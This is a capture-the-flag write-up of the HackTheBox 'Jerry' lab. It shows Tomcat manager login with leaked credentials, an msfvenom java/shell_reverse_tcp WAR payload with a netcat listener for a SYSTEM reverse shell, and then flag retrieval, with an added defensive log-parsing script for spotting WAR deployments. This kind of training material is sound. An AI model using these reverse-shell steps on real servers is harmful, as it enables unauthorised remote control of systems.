In this post, we cover HackTheBox Jerry, part of the Beginner Track on Hack The Box. We demonstrate the path from the Apache Tomcat manager application to a full shell.

Machine Difficulty: Easy

Demonstrated Concept: Apache Tomcat exploitation via weak manager credentials.

The Apache Tomcat® software is an open source implementation of the Jakarta Servlet, Jakarta Server Pages, Jakarta Expression Language, Jakarta WebSocket, Jakarta Annotations and Jakarta Authentication specifications. These specifications are part of the Jakarta EE platform.

Initial Steps & Enumeration

First, I made sure the machine was up and running and that I had its IP address. Then, I ran an Nmap scan. This scan was quite revealing, showing only one open port: 8080. This port was running Apache Tomcat with Coyote JSP engine 1.1, and the operating system was identified as Microsoft Windows Server 2012. Since only port 8080 was open, I immediately decided to check out what was running on it by navigating to the machine’s IP address on that port in Firefox.

Exploiting Tomcat

I know that Tomcat installations can often be compromised by accessing their manager application. So, I tried to access the /manager/html path. This brought up a login prompt. I initially thought about trying common default credentials like tomcat/tomcat, but they didn’t work.

Interestingly, when I clicked “Cancel” on the login prompt, the “Unauthorized” page displayed a very helpful disclosure: username=tomcat and password=s3cret. This was an unexpected but welcome find! I then used these credentials (tomcat/s3cret) to successfully log into the Tomcat manager application.

Gaining a Shell

Once I was inside the Tomcat application manager, my plan was to upload a WAR (Web Application Archive) file that contained a reverse shell payload. I used msfvenom to create this Java payload. Here’s the command I used:

```bash
sudo msfvenom -p java/shell_reverse_tcp LHOST=<my_ip_address> LPORT=4545 -f war -o shell.war
```

I made sure to replace <my_ip_address> with my actual IP address (which I got using ifconfig). The payload type was java/shell_reverse_tcp, and I set the listening port on my machine to 4545. The output file was named shell.war.

While the payload was generating, I set up a listener on my machine using Netcat:

```bash
nc -lvp 4545
```

After the shell.war file was created, I went to the “WAR file to deploy” section in the Tomcat manager, browsed for shell.war, and deployed it. As soon as it was deployed, I clicked on the newly deployed “shell” application in the manager. This action triggered the reverse shell, and I immediately received a connection on my Netcat listener!
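As an added, defender-side example (not part of the original write-up), the following Python script parses Tomcat access-log lines in Tomcat's default common log format and flags the manager-application activity this walkthrough relies on: authentication failures against /manager, successful manager access, and WAR uploads. The log lines are constructed for illustration and the manager paths are the ones the HTML UI and text interface expose by default.

```python
import re
from collections import defaultdict

# Tomcat's default access log uses the Common Log Format:
#   %h %l %u %t "%r" %s %b  -> host, ident, authenticated user, time, request, status, bytes
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<bytes>\S+)$'
)

# Paths through which the manager app accepts a new WAR (HTML UI and text/scripting interface).
DEPLOY_PATHS = ("/manager/html/upload", "/manager/text/deploy", "/manager/deploy")

# Constructed sample log modelled on this write-up: two 401s from the login prompt (Tomcat logs
# "-" as %u when authentication fails), a successful login, a WAR upload, then the first hit
# on the freshly deployed application, plus one unrelated client.
SAMPLE_LOG = """\
10.10.14.3 - - [20/Jan/2024:10:01:05 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.3 - - [20/Jan/2024:10:01:09 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.3 - tomcat [20/Jan/2024:10:01:31 +0000] "GET /manager/html HTTP/1.1" 200 11234
10.10.14.3 - tomcat [20/Jan/2024:10:02:02 +0000] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=ABC HTTP/1.1" 200 12011
10.10.14.3 - - [20/Jan/2024:10:02:10 +0000] "GET /shell/ HTTP/1.1" 200 0
192.168.1.20 - - [20/Jan/2024:10:05:00 +0000] "GET /index.jsp HTTP/1.1" 200 11156
"""

def parse(line):
    """Return a dict of fields for one access-log line, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def find_manager_activity(log_text):
    """Group manager auth failures, manager logins and WAR deployments by client host."""
    findings = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse(line)
        if rec is None:
            continue
        path = rec["path"].split("?", 1)[0]          # drop the CSRF nonce / query string
        if not path.startswith("/manager/"):
            continue
        if rec["status"] == "401":
            findings[rec["host"]].append(("manager_auth_failure", rec["user"]))
        elif rec["method"] == "GET" and path == "/manager/html" and rec["status"] == "200":
            findings[rec["host"]].append(("manager_access", rec["user"]))
        if path in DEPLOY_PATHS and rec["status"] in ("200", "302"):
            findings[rec["host"]].append(("war_deploy", rec["user"]))
    return dict(findings)

if __name__ == "__main__":
    for host, events in find_manager_activity(SAMPLE_LOG).items():
        print(host, events)
```

A burst of manager_auth_failure events followed by manager_access and war_deploy from the same host within a couple of minutes is the pattern to alert on; in production the manager app should also be restricted by the RemoteAddrValve and given a unique, strong password in tomcat-users.xml.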

Post-Exploitation & Flag Retrieval

With the shell in hand, I first checked my user privileges:

```bash
whoami
```

The output was nt authority\system, which meant I had the highest level of privileges on the Windows system. This was great because it meant no further privilege escalation was needed!

My next step was to find the flags. I navigated to the C:\Users\Administrator\Desktop\flags directory. Inside this directory, there were two files. I initially tried cat to read them, but then remembered that on Windows, the correct command is type. The files had spaces in their names, like “2 for the price of 1.txt”, so I had to use quotation marks around the filename:

```bash
type "2 for the price of 1.txt"
```

This command revealed both the user flag and the root flag! I then submitted these flags on the Hack The Box platform.

I rated this machine as very easy, a “piece of cake”; the overall goal is to complete the entire track, which is aimed at users of all skill levels.

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by Motasem Hamdan, a cybersecurity content creator and YouTuber.